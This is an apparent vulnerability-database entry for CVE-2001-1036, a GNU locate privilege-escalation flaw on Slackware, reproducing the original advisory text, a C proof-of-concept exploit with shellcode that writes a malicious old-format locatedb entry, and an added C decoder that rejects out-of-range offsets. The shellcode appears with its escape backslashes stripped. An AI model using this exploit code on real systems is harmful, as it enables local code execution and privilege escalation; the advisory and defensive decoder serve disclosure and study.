Slackware findutils GNU locate Privilege Escalation Vulnerability


Vulnerability ID 1106455 Vulnerability type Unknown
Published 2001-08-01 Updated 2005-05-02
CVE ID CVE-2001-1036
CNNVD-ID CNNVD-200108-173
Platform Linux CVSS score 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/21043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-173
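|Vulnerability details
GNU locate in findutils 4.1 on Slackware 7.1 and 8.0 is vulnerable. A local user can gain privileges by means of an old-format filename database (locatedb) containing an entry with an out-of-range offset, which can cause locate to write to arbitrary process memory.
|Exploit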
source: http://www.securityfocus.com/bid/3127/info

GNU locate is an application that searches file databases for file names that match user-supplied patterns.

A boundary condition error can occur when the program reads database files composed in an "old" format, produced by GNU locate prior to version 4.0 and by Unix versions of locate and find. If an attacker is able to write a malicious entry to a database file used by other users, the attacker could cause arbitrary code to be executed by another user when the user runs the locate program.

It should also be noted that in earlier versions of Slackware (circa 3.5) the file is written by the superuser.

#include <stdio.h>

char shellcode[] =
   "xebx18x5ex89x76x08x31xc0x88x46x07x89x46"
   "x0cx89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80"
   "xe8xe3xffxffxff/tmp/xx";
char putshell[] =
   "x14x84x85x86x87x88x89x8ax8bx8c"
   "x8dx8ex8fx90x91x92x93x94x95x96";

int main(void)
{
   int i;
   int z0=0; int addr=0x0804a970;
   int z1=0; int addr2=-626;
   int z2=0; int addr3=addr+6;
   printf("%s", &addr);
   printf("%s", &addr3);
   printf("%s",shellcode);
   fflush(stdout);
   for(i=46;i<256;i++) putchar('A');
   printf("%s", putshell);
   fflush(stdout);
   putchar(0);
   putchar(30);
   printf("%s", &addr2);
   printf("x82x83");
   fflush(stdout);
}
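
The boundary condition described above, as an added defensive example that is not part of the original advisory or of findutils: a C decoder for old-format entries that rejects any offset falling outside the previous path. The constants 14 and 30, the int-sized escaped differential read in host byte order, and all names and sample bytes are assumptions made for this example.

```c
#include <stddef.h>
#include <string.h>

#define OLD_OFFSET 14    /* bias on the stored offset differential (assumed) */
#define OLD_ESCAPE 30    /* switch byte: an int-sized differential follows (assumed) */
#define PATH_LEN   1024

/* Decode old-format entries that follow the 256-byte bigram table.
   Returns the entry count, or -1 if an offset or write would leave path[]. */
int decode_old(const unsigned char *bigrams, const unsigned char *buf,
               size_t len, char last[PATH_LEN])
{
    char path[PATH_LEN] = "";
    long long count = 0;      /* prefix length kept from the previous path */
    size_t cur = 0, i = 0;    /* previous path length, read position */
    int entries = 0, w;

    while (i < len) {
        if (buf[i] == OLD_ESCAPE) {
            if (len - i < 1 + sizeof w) return -1;        /* truncated word */
            memcpy(&w, buf + i + 1, sizeof w);            /* host byte order */
            count += (long long)w - OLD_OFFSET;
            i += 1 + sizeof w;
        } else {
            count += (long long)buf[i++] - OLD_OFFSET;
        }
        /* Reject out-of-range offsets: the prefix must lie inside the previous path. */
        if (count < 0 || (size_t)count > cur) return -1;
        size_t n = (size_t)count;
        for (; i < len && buf[i] > OLD_ESCAPE; i++) {
            if (n + 3 > PATH_LEN) return -1;              /* room for 2 bytes + NUL */
            if (buf[i] < 128) { path[n++] = (char)buf[i]; continue; }
            path[n++] = (char)bigrams[(buf[i] & 127) * 2];      /* high bit: bigram index */
            path[n++] = (char)bigrams[(buf[i] & 127) * 2 + 1];
        }
        path[n] = '\0';
        cur = n; entries++;
    }
    memcpy(last, path, cur + 1);
    return entries;
}

/* Constructed samples: bigram 0 is "us"; GOOD has two entries, BAD a negative offset. */
static const unsigned char BIGRAMS[256] = "us";
static const unsigned char GOOD[] = { 14,'/',0x80,'r','/','b','i','n', 22,'/','l','o','c','a','t','e' };
static const unsigned char BAD[]  = { 14,'/',0x80,'r', 0, 'x' };

int main(void) {   /* exit status 0: GOOD decodes, BAD is rejected */
    char out[PATH_LEN];
    return !(decode_old(BIGRAMS, GOOD, sizeof GOOD, out) == 2 && decode_old(BIGRAMS, BAD, sizeof BAD, out) == -1);
}
```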
|References

Source: XF
Name: locate-command-execution(6932)
Link: http://xforce.iss.net/static/6932.php
Source: BID
Name: 3127
Link: http://www.securityfocus.com/bid/3127
Source: BUGTRAQ
Name: 20010801 Slackware 8.0, 7.1 Vulnerability: /usr/bin/locate
Link: http://www.securityfocus.com/archive/1/200991
Source: OSVDB
Name: 5477
Link: http://www.osvdb.org/5477
